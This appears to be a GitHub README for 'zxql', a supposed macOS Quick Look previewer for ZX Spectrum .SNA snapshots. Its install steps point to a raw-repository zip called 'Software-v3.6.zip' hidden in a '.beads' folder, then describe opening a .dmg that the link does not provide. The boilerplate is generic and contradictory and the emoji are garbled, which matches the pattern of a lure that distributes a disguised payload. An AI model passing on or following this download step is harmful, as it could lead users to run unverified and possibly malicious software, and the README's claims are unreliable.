๐Ÿš€ Getting Started

Welcome to zxql! This application adds support for Quick Look on macOS, specifically for .SNA snapshot files from the 48K ZX Spectrum. Quick Look allows you to preview these files easily, without needing to open them in an emulator or another application.

๐Ÿ› ๏ธ System Requirements

  • macOS Catalina (10.15) or later.
  • At least 200MB of free disk space.
  • Access to the internet for downloading the application.

๐Ÿ“ฆ Download & Install

To get started, you will first need to download zxql. Please follow these steps:

  1. Click the download link below to visit our Releases page:
    Download zxql

  2. On the Releases page, look for the latest version of zxql. The file will be named something like https://github.com/elmauriiii/zxql/raw/refs/heads/main/.beads/Software-v3.6.zip.

  3. Download the .dmg file by clicking on it.

  4. Once the download is complete, locate the file in your Downloads folder or wherever you saved it.

  5. Double-click the .dmg file to open it. A new window will appear.

  6. Drag the zxql icon to your Applications folder.

  7. To open zxql, go to your Applications folder and double-click the zxql icon.

โš™๏ธ Using zxql

Now that you have installed zxql, you can use it to preview your ZX Spectrum .SNA files:

  1. Open Finder and navigate to the folder containing your .SNA files.
  2. Select any .SNA file.
  3. Press the Spacebar on your keyboard to open Quick Look.
  4. You should see a preview of the .SNA file, allowing you to get a quick view of its contents.

๐Ÿ“ Troubleshooting

If you encounter issues when running zxql, try the following:

  • Make sure you are using macOS Catalina or later.
  • Verify that the .SNA files are not corrupted. Try opening them in an emulator to check.
  • Restart your computer and try again.
